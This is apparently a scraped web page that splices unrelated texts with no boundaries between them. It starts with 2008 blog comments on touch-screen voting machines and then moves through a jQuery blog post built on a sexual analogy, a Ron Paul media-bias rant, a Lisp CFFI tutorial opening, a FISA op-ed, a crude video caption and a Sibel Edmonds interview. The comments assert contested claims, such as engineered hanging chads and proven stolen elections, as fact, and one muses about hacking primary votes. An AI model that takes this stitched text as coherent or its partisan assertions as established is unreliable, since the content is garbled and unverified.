... abacus said on 1/5/2008 @ 10:48 am PT ...
# 16 Hand count paper ballots ...
COMMENT # 19 [ Permalink ]
... Jack Nachamkin said on 1/5/2008 @ 12:29 pm PT ...
Here are some suggestions that might help : 1 . Elections should be held on two consecutive days , which are declared work holidays for the entire nation .
This will allow people who " must " work to find alternates for a day .
2 . Political contributions must be limited to private citizens and not exceed $ 25 per year .
3 . The fairness doctrine must be reinstated and extended to all MSM .
4 . Paper ballots must be used and voters must also be given a carbon copy of their cast ballot , which they must retain for seven years in legible form along with their tax records .
5 . People must learn to fly by flapping their arms .
I included # 5 because I wanted something that had at least a physically reomote possibilty of happening .
COMMENT # 20 [ Permalink ]
... Brad Friedman said on 1/5/2008 @ 1:14 pm PT ...
Jack Nachamkin -
The first three issues you mention have to do with an entirely different issue than the mechanics of elections , which are discussed in the article .
The point of taking a copy of the ballot home is a horrible idea , as it will lead to vote buying / selling .
To answer Pat 's questions , in three five easy steps , I 'd say : 1 ) All DRE ( usually known as touch - screen ) voting systems must be banned from elections , and never used again .
Period .
That 's with or without a so - called " paper trail " .
2 ) There must be a paper , hand - marked ballot for ever vote cast .
3 ) All paper ballots must be counted at the precinct , on election night , in view of any and all observers .
4 ) Results must be posted at the precinct before any ballots are removed to be sent back to the central county headquarters ( where I do n't mind at all if they are counted again , in full public view of everybody . )
5 ) A hand - count spot check ( sometimes called an " audit " ) of ballots shall be performed , of a randomly selcted percentage large enough to assure a scientific statistical confidence rate of 99 % , that the original results were correct ( and I 'd prefer if that spot check be done at the precinct , on election night , instead of post - election at the county , but I 'll take what I can get for now . )
NOTE : The suggestions above apply no matter if the ballots are counted by hand or by op - scan at the polling place .
The key , as Bev Harris rightly points out above , is full public transparency at every step , and checks and balances at every step , in every point of the process .
Hope that helps , Pat !
Please spread the word !
And thanks for asking !
COMMENT # 21 [ Permalink ]
... Pat # 1 said on 1/5/2008 @ 4:46 pm PT ...
I like the ideas ... this place has some of the best around .
My question should have been stated more clearly :
What are the simplest three procedures to ensure these ideas take hold ?
I can say how bad the system is all day long , and have the right ( common sense ) ideas , but what are the most effective ways of bringing change about ?
My back - assward 3 come to this :
1. Tar
2. Feathers
3. Rope
Now , that 's in my opinion the most simple answer , but we all know that 's not gonna happen
COMMENT # 22 [ Permalink ]
... leslie said on 1/5/2008 @ 6:59 pm PT ...
* looking at a steady diet of coffee and Zantac from now until the election *
COMMENT # 23 [ Permalink ]
... Phil said on 1/5/2008 @ 7:44 pm PT ...
The problem with electronic voting , the technology should have never been used to tabulate votes , it should have only been used to assist the disabled to PRINT paper ballots to be hand counted with public oversight .
So stop tabulating votes with electronics !
PRINT PAPER BALLOTS , HAND COUNT THEM WITH PUBLIC OVERSIGHT .
We can talk about money and studies and waste , or get confused about policies and procedures , or technicians vs. computer scientists vs programmers , or journalists vs bloggers .
It 's all going nowhere , except for the continued loss of civil rights by those who are in power breaking the Constitution .
It 's all a waste of OUR time , time that is needed to get this problem fixed quickly .
The slower it takes to fix this problem correctly , the more damage is done to our country 's Constitution .
( And other countries )
These machines are a national security nightmare , we would n't have a war right now if Bush was n't elected by the Supreme Court !!!!!!!
Who 's Doping the parts ?
Who 's Coding ?
Where do the LCD 's come from ..
Blagh ... it do n't matter when someone does n't want you to have the Constitutional right to vote .
We 'll never have our Constitutional right to vote restored again until these devices ( ALL OF THEM ) that tabulate actual votes are outlawed everywhere .
If we can't vote then we no longer live in a Constitutional Republic .
That should be the topic for the New York Times .
I did n't expect nothing but spin on this issue and that what I see .
No solution given .
Where many here have given you a working solution many times , and many times cheaper than all this vaporware crap .
COMMENT # 24 [ Permalink ]
... Michael g said on 1/5/2008 @ 8:23 pm PT ...
" It ’s difficult to say how often votes have genuinely gone astray .
Michael Shamos , a computer scientist at Carnegie Mellon University who has examined voting - machine systems for more than 25 years , estimates that about 10 percent of the touch - screen machines ' fail ' in each election .
“ In general , those failures result in the loss of zero or one vote , ” he told me .
' But they ’re very disturbing to the public . ' "
THE LOSS OF ZERO OR ONE VOTE ????
talk about deceptive interviewing !
A " computer scientist " who trusts computers so much that he can confidently KNOW that ?
Idiot or misquote ...
COMMENT # 25 [ Permalink ]
... Stu said on 1/5/2008 @ 9:16 pm PT ...
Politicians get elected quite a lot of the time because they just happen to find some missing votes , this has been going on for decades .
Dead people , people that are non-existent , etc. have been voting for decades .
There is always been corruption in voting .
The chance of the elite allowing the masses to oversee the election is a waste of time because the masses are divided and will be unable to come to a conclusion , plus many of the masses also work for the elite .
The main problem is that each side of the masses think that the other group of the masses is the culprit when in reality it is the elite .
I have read a lot of different blogs , etc from both sides and the chances of them getting together is about ZERO because they think the other side is the one cheating .
The ideological views of each side are too far apart .
Playing the elites game is like watching a movie many times and expecting a different ending each time .
Comment 21 seems like a good place to start .
COMMENT # 26 [ Permalink ]
... Big Dan said on 1/5/2008 @ 9:50 pm PT ...
Yes , the elites have been stealing elections for a long time , like one commentor said ... BUT ... now it 's easier and can be done by fewer people on e-vote machines .
COMMENT # 27 [ Permalink ]
... Big Dan said on 1/5/2008 @ 9:51 pm PT ...
Also , I believe Ron Paul did NOT pursue e-vote fraud in an earlier straw poll this year ... when urged to do so , he stopped his people .
COMMENT # 28 [ Permalink ]
... Big Dan said on 1/5/2008 @ 9:53 pm PT ...
Who said , " If voting really counted , it would be illegal " ???
COMMENT # 29 [ Permalink ]
... JUDGE OF JUDGES said on 1/6/2008 @ 12:23 am PT ...
I 'd be willing to bet it would n't take much of a code change . . . to turn your old DRE into a wicked pissa Ouija Board . . . . .
COMMENT # 30 [ Permalink ]
... FreedomOfInformationAct said on 1/6/2008 @ 1:24 am PT ...
Can we count on voting machines ?
NYT Mag : Roughly 1/3 of all '08 votes will be cast on touch - screens .
Article
http://www.nytimes.com/2...nted=all&oref=slogin
Replies
http://rawstory.com/comments/43221.html
COMMENT # 31 [ Permalink ]
... Grizzly Bear Dancer said on 1/6/2008 @ 2:41 am PT ...
Brad and American Patriots at B Blog can always be counted on for an intelligent presentation of election and voting issues as well as viable solutions .
Part of the good history of this country left over mainly from positive strides taken in the 60's and 70's are the native American kids who were the products of that time period .
They would rather stand up in our new society of fear like this country 's constitutional forefathers and get the truth out than give these greedy lying 1 % er multi-national corporatists and their U.S. government representives that have completely infiltrated our system a pass to continue on their path of death , destruction , and increased Executive branch powers .
I think the point made by Brad and Bev Harris that any and all Americans shoud be able to view the counting of paper ballots at a precinct is an excellent ideal .
Moving forward all ages including public school student should be allowed to attend this event and it would establish a new president for American Democracy in the right direction .
This would definitely be a step up from the votes counted in secrecy method on hackable hardware .
Thank you !
GBD
COMMENT # 32 [ Permalink ]
... Floridiot said on 1/6/2008 @ 2:57 am PT ...
Good stuff all , not much to add except the article was weak in a few areas ...
I wanted to show this OT piece to ya before it falls off the radar .
When is the last time this happened ?
Before the Great Depression ? ,
Or during the Reagan years ?
Dividends in Financial Services Sector Likely to Be Casualties of Tightening Credit Markets
Even looks bad to me , a person who does n't delve into this area much
Link
COMMENT # 33 [ Permalink ]
... Phil said on 1/6/2008 @ 3:39 am PT ...
Here 's a guy that 's confused about the National Security problem with devices that are tabulating votes electronically .
He thinks we should be voting on the internet !!!
http://www.popularmechan...nology_news/4237621.html
COMMENT # 34 [ Permalink ]
... leftisbest said on 1/6/2008 @ 4:51 am PT ...
STU # 25 said , " The chance of the elite allowing the masses to oversee the election is a waste of time because the masses are divided and will be unable to come to a conclusion , plus many of the masses also work for the elite . "
The problem with this kind of thinking is that it discourages action .
What if our founding fathers had followed that logic ?
We 'd still be subjects of King George ( oops , I guess we still are ! ) .
The point is this - you are what you think .
You can do what you think you can do .
The EI movement has made massive strides in getting EI issues in front of the public , albiet very slowly and with much resistance from the M$M .
We HAVE to keep showing the folly of secretly counting our votes .
The Kenya story was a perfect example of how having precinct - based counts released FIRST and posted at the precincts can act as a check and balance on the power elite .
BTW , has there been any follow up on the phony election in Kenya ?
Has the opposition been able to rally enough of the citizens to force a recount or a new election ?
COMMENT # 35 [ Permalink ]
... Dredd said on 1/6/2008 @ 6:17 am PT ...
Bev # 11 and JMAC # 12
If the author really cared he would know that his own NYT during 1985 wrote articles about the dangers , and that NIST , which most of the time is not " the fringe .
. . scared - senseless computer geeks " did a study 20 years ago .
And if the NYTM dude read Bradblog much , he would have noticed a post of mine too :
The electronic voting machine ( EVM ) watchdogs twenty years ago were saying what was said before the committee recently ( 1988 Article ) .
You can shock the hell out of the EVM audience with these quotes from a 1988 official report :
4.13 Summary Of Problem Types 4.13.1 Insufficient Pre-election Testing
4.13.2 Failure to Implement an Adequate Audit Trail
4.13.3 Failure to Provide for a Partial Manual Recount
4.13.4 Inadequate Ballots or Ballot - Reader Operation
4.13.5 Inadequate Security and Management Control
4.13.6 Inadequate Contingency Planning
4.13.7 Inadequate System Acceptance Procedures ... Concern had been heightened by a series of articles published in the summer of 1985 in the New York Times .
The articles cited statements by two computer experts reporting that a computer program widely used for vote - tallying was vulnerable to tampering .
Several elections were identified in which losing candidates claimed that it would be possible to fraudulently alter the computer programs that were used in their contests .
( NIST Report 1988 , bold added ) .
No one mentioned that twenty years is enough to have more than " suggested rules " which are admittedly inadequate ... which election war lords are ignoring anyway .
And who asked why one person certifies the machines no matter how many ITA companies claim to do the certification ?
Or who sets the standards of the lone ranger doing the testing ( The Lone Tester ) ?
... ( continued below ) .
COMMENT # 36 [ Permalink ]
... Dredd said on 1/6/2008 @ 6:25 am PT ...
( post # 35 continued ) I posted another one too :
Nothing was said in the press about the secretly programmed computer chips inside the " Shouptronic " Direct Recording Electronic ( DRE ) voting machines in Manchester , the state 's largest city .
These 200 - pound systems were so easily tampered with that the integrity of the results they gave — and George Bush was the beneficiary of their tallies — will forever be in doubt .
Consider these points : 1 . The " Shouptronic " was purchased directly from a company whose owner , Ransom Shoup , had been twice convicted of vote fraud in Philadelphia .
2 . It bristled with telephone lines that made it possible for instructions from the outside to be telephoned into the machine without anyone 's dear knowledge .
3 . It completely lacked an " audit trail , " an independent record that could be checked in case the machine " broke down " or its results were challenged .
4 . Roy G. Saltman , of the federal Institute for Computer Sciences and Technology , called the Shouptronic " much more risky " than any other computerized tabulation system because " You are fundamentally required to accept the logical operation of the machine , there is no way to do an independent check . "
A year later , in June of 1989 , Robert J. Naegele , who had investigated all computerized voting systems for New York State , warned : " The DRE ( which the Shouptronic was ) is still at least a year and possibly two away from what I would consider a marketable product .
The hardware problems are relatively minor , but the software problems are conceptual and really major " .
A source close to Gov. Sununu insists that Sununu knew from his perspective as a politician , and his expertise as a computer engineer , that the Shouptronic was prime for tampering .
How could such an offense against the United States electoral process have been carried out under the gaze of professionals from the nation 's TV networks , newspapers and wire services ?
( ELECTRONIC HOODWINK , emphasis added ) .
I get back to Jen # 3 where Jen hypothesizes that it is n't the story that stands out as great " news " in this case , it is the timing of it that is " news " .
COMMENT # 37 [ Permalink ]
... Pablo de Albuquerque said on 1/6/2008 @ 7:10 am PT ...
No real mention of Nov 2004 in the article ...
When is the massive evidence compiled by Brad , Ohio's FreePress , Palast etc. going to get its ' rightful play inthe MSM ?
The stolen 2004 election is still treated like an " internet conspiracy theory " , where it is perhaps one of the more disturbing chapters in our democracy .
COMMENT # 38 [ Permalink ]
... Marky said on 1/6/2008 @ 7:29 am PT ...
I just read the full NYT article , and am appalled .
It wrote of Florida 2000 , but failed to note that those hanging chads were intentionally engineered to fail to sell electronic machines and swing the election .
The article failed to show that the actual count of ballots showed Gore the winner .
It failed to indicate that Ney co-wrote HAVA .
It failed throughout to show the partisanship and Republican intentions in this mess throughout .
It failed to talk about Blackwell throwing the election , the criminal prosecutions , and the proven vote - switching in Ohio 2004 .
In short , it failed to indicate the Republican 's culpability in this from the start .
It totally focussed on unreliability and POTENTIAL insecurtiy .
What a snow job !
The technical solutions are obvious , and have been outlined , once again , here in the comments .
But technical solutions will not solve this problem .
The problem is big corporate money in politics .
After Iowa , two of the best qualified Democrates , Biden and Dodd , dropped out , leaving Kucinich as the only qualified Democrat that is not bought and paid for .
It is generally accepted that he can't win , because he does n't have the money , because he is not bought and paid for .
How can we fix this ?
Ron Paul has been mentioned here .
Are you aware that he will do his best to outlaw abortion ?
That he ignores Global Warming ?
He may not be bought and paid for , but he will not reign in the corporations .
He is no solution .
COMMENT # 39 [ Permalink ]
... gtash said on 1/6/2008 @ 8:07 am PT ...
I thought this link might make for some interesting reading too .
Seems like NYT did n't impress this crowd either --- http://markcrispinmiller...es-to-nytimes-expos.html
COMMENT # 40 [ Permalink ]
... Jungle said on 1/6/2008 @ 9:50 am PT ...
Ron Paul never said he'd " do his best to outlaw abortion . "
Dr. Paul , as a Constitutionalist , DID say it was up to the individual States to decide , which is a far cry from " outlawing " abortion .
This is simple , people .
If you want to live in a Constitutional Republic , of laws , support Ron Paul .
If you want to live in a Bananna Republic , of lawless men , support any other candidate .
If the People reject Ron Paul , and his message , the People have spoken and get the leadership they deserve .
COMMENT # 41 [ Permalink ]
... Stu said on 1/6/2008 @ 10:17 am PT ...
Thats the problem .
There has been action for decades , but unfortunately it is canceled out by each side fighting each other .
Action is worthless if it is canceled out .
This is what the elite want , as long as each side is fighting each other the elite will win .
Everybody is calling for voter reform , but they are considering the other side to be the culprit instead of the real problem the elite .
The masses have to get their minds off of each other and look at the real puppet masters .
Politics is just a game of the elite to keep the sheple busy .
It is time for the sheeple to WAKE UP .
FOCUS FOCUS
The chance of each side being right is ZERO while the chance of both being wrong can be 100 % .
COMMENT # 42 [ Permalink ]
... jerry s said on 1/6/2008 @ 11:06 am PT ...
Let me see MAYBE a clever independent hacker can get Ron Paul or Dennis K into the mix by correcting the vote in Each primary ?
Hummmm how loose is the DRE access -
Often the elite create climates and systems that spin out of their control .
COMMENT # 43 [ Permalink ]
... Grizzly Bear Dancer said on 1/6/2008 @ 12:10 pm PT ...
Slightly O.T. - Comments # 38/#40 : Admittingly unaware of Ron Paul 's stance that the sum of man 's pollution and the greenhouse effect 's heat on current world climate and our world species is a bunch of lies by NON - PROFIT environmental groups and concerned people trying to protect our planet .
This is unforgiving if true by someone who calls himself Dr. How bout an opinion of a congress under the leadership of greedy oil baron / president of the senate dick cheney that has reversed over 250 environmental laws or lowered over 400 standards ALWAYS in favor of pollutors ?
Does he support the dissenting opinions given gospel status in the corporate mass media of the " do n't worry bout nothing climate has changed before stance " paid for by the same greedy oil / energy companies who want to confuse anyone who will listen and continue exploiting oil reserves ?
Maybe he is a doctor but taking the right of choice away from a woman and giving that decision to a particular state government should be a red flag .
Has he studied the history of this subject before it was legal ?
The fact remains that a government cannot stop a woman from ending an unwanted pregnancy .
" Rich " parents or whoever with money will fly to Mexico or where ever to have the proceedure done in a clean safe medical environment .
The poor and kids given no other choice will go back to the coat hanger witch doctor and the backstreet abortion .
Way to go American politicians .
Good to see we are really making strides in 2008 .
At least Mr. Kusinich wants to IMPEACH parsitic treasonous murderer dick cheney .
COMMENT # 44 [ Permalink ]
... Stu said on 1/6/2008 @ 12:20 pm PT ...
Everybody is playing the wrong game .
As long as you keep playing this game you will get the same results .
A politician is a politician and you can watch the movie as many times as you want it is always going to be the same .
COMMENT # 45 [ Permalink ]
... MarkH said on 1/6/2008 @ 2:52 pm PT ...
God , I love this site .
Thanks Brad !
Ain't it amazing what you do n't read in the mainstream media ?
COMMENT # 46 [ Permalink ]
... Big Dan said on 1/8/2008 @ 4:33 pm PT ...
Democracy NOW !
How to Rig an Election : Convicted Former GOP Operative Details 2002 New Hampshire Phone Jamming Scheme
We speak with former Republican operative Allen Raymond , who served time in federal prison for jamming phone lines of the New Hampshire Democratic Party in 2002 to block a Democratic get - out - the - vote campaign .
Raymond has come out with a tell - all book called How to Rig an Election : Confessions of a Republican Operative .
In addition to the phone - jamming scheme , Raymond details other Republican tactics such as the use of scripted , phony automated phone messages to try to play on white voters ’ racial prejudices in a 2000 New Jersey congressional race . " " " " " " " " " "
ALLEN RAYMOND : Well , on Election Day in 2002 in New Hampshire , we were — it was one of many clients that we had , but in New Hampshire our client was the New Hampshire Republican State Committee .
And we were conducting what later became known as the phone - jamming operation , which was an effort to jam telephone lines at a volunteer phone bank in Manchester , New Hampshire , with the intent to disrupt lines of communication — in other words , to disrupt Democrats ’ effort to get out the vote on Election Day there .
" " " " " " " " " " " " " " " " " " " " " " " " " " " " "
http://www.democracynow....ig_an_election_convicted
COMMENT # 47 [ Permalink ]
... Big Dan said on 1/8/2008 @ 4:36 pm PT ...
" People like me are hired to engineer victory . "
COMMENT # 48 [ Permalink ]
... Big Dan said on 1/8/2008 @ 4:38 pm PT ...
Whaddya tink o' dat ?
People like him are hired by the Republican Party to " engineer victory " !
How about that ?
COMMENT # 49 [ Permalink ]
... Big Dan said on 1/8/2008 @ 4:40 pm PT ...
j Query 1.2 - An Unexpected Surprise
Yesterday , Rey Bango alerted me to the fact that jQuery 1.2 was just released .
I was not only excited by this , I was also surprised ; I mean , jQuery is already so freakin hot n' sexy , how much could it possibly be improved ?
Well , taking a look at the release notes , I am seeing a lot of cool stuff .
Nice new selectors and some very neat traversing methods .
They 've also trimmed a bunch of the fat , getting rid of features that were rarely used and only added dead weight to the core library .
j Query is so powerful and so easy to use that I once had concern over it becoming my " Vibrator Dilemma " .
For those of you who do n't know what this is , it concerns female masturbation .
In this realm , the realm of female masturbation , there are two major players : manual stimulation with just the hands and manual stimulation with the aide of a vibrator .
Of the women who have discussed this part of their lives with me , I have found a consistent theme and that is a fear of the vibrator .
This fear does not stem from the vibrator itself , but rather from a dependence on the vibrator .
It seems that while a vibrator provides an easier and faster route to climax , these women , the ones I have talked to , almost prefer not to use it .
This confuses me ; I know that if there was a way that I could learn faster or build muscle faster with the aid of a small device , I would certainly not hesitate to you use it .
So , naturally , I question this fear and ask for an explanation .
The reasoning most often provided : no one wants to end up in a situation where they do not have a vibrator on hand and discover that they can no longer get " off " without one .
I had always thought this idea to be quite silly ... until I met jQuery .
Then , suddenly , there was something very real about it .
jQuery provided me with a way to write really powerful Javascript code with very little effort .
What used to take me a good deal of time writing user defined functions , wiring event hooks , and lots of Google searching , suddenly took only a few seconds with a jQuery selector or two , an event binder , and an each ( ) method call .
It was just too easy .
And , after the initial high wore off , the panic set in - what if jQuery was my " Vibrator Dilemma " ?
What if its awesome feature set and ease - of - use slowly eroded my ability to write powerful Javascript on my own ( without the help of jQuery ) .
I finally understood what these woman were saying ; sometimes ( maybe a lot of the time ) , what we can do on our own is n't as good as what we can do with help and that loss of independence ( for lack of a better term ) is very scary .
So scary , in fact , that we then choose to perform at a sub- optimal level just so we can say that we did it on our own .
Well , not me - not this time at least .
I know that jQuery is awesome .
I know that jQuery allows me to write better code than I could have written before I met it .
I am OK with this and I embrace it .
There is no dilemma to be had - jQuery is easier , faster , better and I will use it .
It is simply " the way " .
Tweet This Titillating read by @ BenNadel - jQuery 1.2 - An Unexpected Surprise
Woot woot — you rock the party that rocks the body !
Enjoyed This ?
You Might Also Enjoy Reading : j Query v1.1.3 Now 800 % Faster ( At The Same Size File ) !
" If you tell a lie big enough and keep repeating it , people will eventually come to believe it .
The lie can be maintained only for such time as the State can shield the people from the political , economic and / or military consequences of the lie .
It thus becomes vitally important for the State to use all of its powers to repress dissent , for the truth is the mortal enemy of the lie , and thus by extension , the truth is the greatest enemy of the State . " -- Joseph Goebbels , NAZI Propaganda Minister
Here in Southern California , the biggest newspaper , the Los Angeles Times , quarantines Ron Paul like he carries the plague .
No subtlety about it , and no apologies or denials either .
As part of the vast Tribune Company , the LA Times must toe the party line and mimic the slanted , Soviet style news orgs , Tass and Pravda .
In their heydey of the Russian Communist , Tass and Pravda only carried what that totalitarian regime wanted them to carry .
What is the Tribune Company , you ask ?
Just the second largest news media corporation in America , capable of shape shifting minds and influencing national elections .
Take a look at these happy faces .
What do you see ?
Anyone missing ?
Where is that fellow , that Constitutionalist , who wants to disband the Federal Reserve ?
Where is Ron Paul , that fellow who actually beat Time Magazines " Man of The Year " by more than a two to one margin among Iowa voters ?
Like the old Soviet - era newspapers , the US mainstream media ( MSM ) controls ALL the news , without apology or denial .
Now take a look at the faces of those who prefer to play ball , who profess change while offering no new or original or bold thinking .
Look at those who want to continue to bomb ( spend ) , invade ( spend ) , sanction ( spend ) or otherwise occupy foreign countries ( spend & spend some more ) .
These happy shape - shifters have the official Tribune sanction and it does n't really matter who wins among them , whether Democrat or Republican .
Here in America , to paraphrase GWB , the " propaganda must be repeated over and over and over again , " whether in news reports or happy pictures , conveying resolute , confident leaders .
Take a look at Obama .
Does n't that photo convey certain Messianic powers ?
Obama Messiah , I call it .
Or how about Mitt Romney casting his shadow on the American flag ?
Certainly he 'll do what 's best for America , right ?
Or how about John McCain ?
The photo says to the viewer : I am strong , forceful yet fully committed to the War On Terror .
No matter how many centuries it takes , and trillions it costs your kids .
As you 'll notice , ALL the pre-approved candidates are shot in flattering poses , usually from below .
Usually surrounded by adoring masses .
Each candidate , exuding folksy charm in the photos , assures us that they are just like us .
And if a man or woman or IDEA can be effaced , by catapulting the propaganda forward over and over again , that idea can be effectively controlled , if not erased altogether .
Like the effective effacement of Ron Paul from the LA Times website .
Nope , not a single photograph did I see from New Hampshire , nor mention of him .
Guess Ron Paul does n't exist .
So you see that big corporations already have their winners .
With corporate - controlled black boxes in place and the MSM controlling the messages and the messengers , controlling the status quo , however precarious , can be maintained .
Nothing to see here ( but smiling faces ) ;
Move along .
A famous man once said : " Through clever and constant application of propaganda , people can be made to see paradise as hell , and also the other way round , to consider the most wretched sort of life as paradise . "
That quote , by master propagandist and warmonger , says it all .
Adolf Hitler always tried to spin paradise out of hell , as his country was collapsing around him , pretty much the way our own corporate propagandists and their happy , hand - selected warmongers do today .
Longtime Rense writer and recent professional photographer Douglas Herman has had his work published in two national magazines recently .
4 An Introduction to Foreign Interfaces and CFFI
Users of many popular languages bearing semantic similarity to Lisp , such as Perl and Python , are accustomed to having access to popular C libraries , such as GTK , by way of “ bindings ” .
In Lisp , we do something similar , but take a fundamentally different approach .
This tutorial first explains this difference , then explains how you can use CFFI , a powerful system for calling out to C and C++ and access C data from many Common Lisp implementations .
The concept can be generalized to other languages ; at the time of writing , only CFFI ’s C support is fairly complete .
Therefore , we will interchangeably refer to foreign functions and foreign data , and “ C functions ” and “ C data ” .
At no time will the word “ foreign ” carry its usual , non-programming meaning .
This tutorial expects you to have a working understanding of both Common Lisp and C , including the Common Lisp macro system .
Harry Reid is the wrong person to be leading the Democratic Party in the U.S. Senate .
By supporting Bush ’s Iraq War , and now by supporting Bush ’s assault on our privacy rights , he has lost any claim to serve as Majority Leader .
Even though Harry Reid owes his post in the Senate to the millions of people who mobilized against the Iraq War , almost the first thing he said after the 2006 election was that he was willing to go along with Bush ’s surge .
And sure enough , under his so - called leadership , the Democrats have kept the Iraq War going by supporting one funding request after another from Bush .
More cowardly even than that , however , has been Harry Reid ’s unforgivable role in the current Administration effort to “ reform ” FISA — the Foreign Intelligence Surveillance Act .
Reid and Reid alone made the decision to bring to the floor of the Senate the disastrous bill of the Intelligence Committee rather than the far better bill that the Judiciary Committee had carefully hashed out , with Senator Russ Feingold doing yeoman ’s work there .
The Judiciary bill did not give retroactive immunity to the telecom companies .
The Intelligence bill does .
The Judiciary bill did not allow the NSA to engage in “ bulk collection ” — to scoop up every international communication into and out of the United States .
The Intelligence bill does .
The Judiciary bill did not allow the NSA to speciously wiretap someone overseas without a warrant so as to get at a U.S. citizen here at home .
The Intelligence bill does .
The Judiciary bill did not weaken the oversight of the FISA Court .
The Intelligence bill does .
It “ reduces court oversight nearly to the point of symbolism , ” as Senator Chris Dodd put it .
Harry Reid could have brought the Judiciary bill forward .
That was his call .
But he chose to have the Senate debate the Intelligence bill instead , knowing full well how hard it would be to get a majority to agree to replace it .
Sure enough , on January 24 , the Senate voted 60 to 34 not to replace it .
“ Under Democratic leadership , the Senate will now continue its debate on surveillance with a bill that resembles something from the Administration ’s playbook , ” said Caroline Fredrickson , director of the ACLU Washington Legal Office .
“ Six months after being hoodwinked into passing the Protect America Act , Americans are still waiting for Congress to grow a spine . ”
Waiting , most of all , for Harry Reid to grow one .
On Monday , the Republicans will try to railroad the Intelligence bill through without amendments .
Fortunately , Dodd is threatening to filibuster yet again .
But that may fail , and it would be unnecessary in any event had Harry Reid been doing his job as Majority Leader — or even his job as someone sworn to defend the Constitution and the Bill of Rights .
If the bill to immunize the telecom companies and to erode our privacy rights passes , Harry Reid will have a lot to answer for .
You have already voted for this video .
We appreciate your help .
You have already reported this video .
This monkey decides to impress the onlookers and urinates into his own mouth .
Glorious .
This monkey decides to impress the onlookers and urinates into his own mouth .
Glorious .
For sale :
West 's deadly nuclear secrets , ' FBI denies file exposing nuclear secrets theft ' and ' Tip - off thwarted nuclear spy ring probe ' )
Former FBI translator Sibel Edmonds stumbled into a world of espionage , nuclear black market , narcotics trafficking , money laundering , and corruption at the highest levels of the US government .
I interviewed Sibel yesterday regarding the current investigation and reporting by the Times , the failures of the US media , and last week 's decision by the Bush administration to legalize the sale of nuclear technology to Turkey , in an apparent to exonerate prior criminal activity by officials in his administration .
Sibel also has some urgent ' action items ' so that we can stop these dangerous nuclear proliferation activities .
I urge you to act on her suggestions .
*************
Luke Ryland :
What do you have to say about the recent work by the Insight journalists - Chris Gourlay , Jonathan Calvert , Joe Lauria - at the UK's Times ?
Sibel Edmonds :
They 've done good , solid reporting so far by doing what reporters are supposed to .
They have been chasing sources and getting their hands on documents .
It 's pretty simple .
As you know , this story has been available to any journalist for six years now .
There 's been a lot of speculation in the last few weeks that American reporters have n't touched this story because they are ' corporate owned ' but it is wrong to exonerate these reporters so quickly .
Many of them are too close to their official sources , and some are simply lazy .
This Times team chases sources , and if they can't reach them one way , they 'll try and try again , or they 'll seek out alternate sources , or find other ways to ensure that they get the story .
When I hear from US reporters , they say ' Sibel , give us all the documents we 'll need , and you line up all the sources for us , and then maybe we 'll do a story ' and if one source does n't return their phone call , they simply give up .
That 's not journalism !
Luke Ryland :
Why has the US failed on this story so dramatically for 6 years ?
Sibel Edmonds :
It 's a combination of things , obviously .
You need to consider that the entire US press corps has failed on this story ; not only the regular print and TV media , but the alternative media has failed on this too .
Part of the reason is that journalists are simply too close to their official sources .
Those sources might tell the journalist that there 's nothing to the story , and so the journalist gives up on it , or the official sources might ' request ' that the journalist to stay away from the story , and the journalist is then concerned about losing access to the source in the future .
Another reason is the partisanship .
With the foreign press , there is no partisanship , and that 's one reason why they have been more effective at covering this case , and I 'm not just talking about the recent Times articles here .
With the US media , it appears as though if there is no clear partisan angle , then there 's no story .
As you know , this case is spread over two administrations , and that appears to make it difficult for the reporters to cover the story .
Even within one news organization you might have one journalist who wants to use the story to indict Clinton , and another who wants to use the story to bash Bush , and in the end neither of them write about the story because it does n't fit their partisanship , their ' narrative ' , so they just drop it altogether .
I had such high hopes for the alternative press , and they do a lot of good work , but partisanship repeatedly gets in the way there too , on both sides .
The US media also suffers from a pack mentality .
I was told by one executive that they were n't doing the story because it was ' old news ' because 60 Minutes did a single segment in October 2002 , even though they only covered a tiny part of the case .
This executive literally told me that he'd only cover the story if it was ' hot and sexy . '
I often think that I 'd need to be able to hire Britney Spears to be a spokesperson - and this is not just for my case , but for any of the many other solid , important cases at the National Security Whistleblowers Coalition .
Apparently this is what it would take to get any coverage .
Of course , given the pack mentality , if any of these stories does become ' hot and sexy ' then all the journalists focus on the same issues and there 's no differentiation in their reporting .
The other major problem in the US is the focus on symptoms , rather than root causes .
My case is a good example , but there are lots of others too .
Look at the early reporting on my case in 2002 , the Washington Post broke the story in July 2002 about the espionage in the translation bureau and then they dropped the story after two weeks .
They stopped reporting on it when more important information came out and the State Secrets Privilege was invoked .
To this day not a single US reporter has asked ' Why was the State Secrets Privilege been invoked here ?
What is going on ? '
Just this week I was approached by a major US outlet who wanted to do a story on Kevin Taskesen !
[ Ed note : Taskesen was an incompetent FBI translator who got his job because his wife worked in the administrative office ]
This is absolutely the most trivial element of the case , and it has already been reported at length .
I told them that they could learn everything they needed to know by watching 60 Minutes , 2002 .
Again , the US media needs to start looking at the root causes of these problems , not the symptoms .
Luke Ryland :
Will the US media start reporting on this now that it is ' hot and sexy ' again ?
Sibel Edmonds :
It 's hard to know .
After being told for years that they wo n't cover it because it is ' old news , ' now there are certain officials in the agencies quietly telling journalists to stay away from the story because I came across a highly sensitive covert national security operation .
Also , Turkey 's army of lobbyists in DC are very effective .
The US press tends to stay away from any stories critical of Turkey , I would say even more than Israel .
There 's also the possible problem of ' eating crow ' but I hope this is n't an issue , this story is way too important for any of that .
The information that has been published in the Times recently could have easily come out four years ago in the US press .
We now need everyone to focus on the important issues .
I have one message for the US media :
If they think this is over , it 's not over .
Much more will come out .
They wo n't be able to ignore it any longer , and so I hope they get over any reluctance they might have .
Look at the positive press that the Times ' series has received since their first article ran .
Do you think their editors have n't noticed ?
The Times is adding more and more resources to the story , more journalists , bigger budgets , and more importantly , they are getting more and more sources coming forward to shed light on these illegal activities .
As I have said from the beginning , this story is not about me , there are many sources who have been waiting for the right time to come forward , I 've probably never even heard of most of them , and now they are coming forward .
This will play out like Watergate played out , with the drip , drip , drip .
So I say to everyone ' Buckle up , there 's much more coming . '
So , hopefully American reporters will start to cover the story .
I 'm not particularly confident , but to a certain degree it does n't matter that much because the internet and the blogs can spread the reporting from the UK as soon as it hits the wires .
Luke Ryland :
Two weeks after the first article in the Times about the involvement of high - level US officials being involved with Turkish and Israeli interests in supplying the nuclear black market , President Bush quietly announced that the US will start supplying nuclear technology to Turkey .
Do you think that is a coincidence ?
Sibel Edmonds :
The timing is certainly very , very suspicious .
The proposals that are being floated are very suspicious too .
There are reports that Turkey will build an enrichment facility , and that Turkey will become the key supplier of nuclear fuel to other Muslim countries who want nuclear power plants .
None of this makes any sense .
And again , the US media is nowhere to be seen on this issue .
Where are the journalists ?
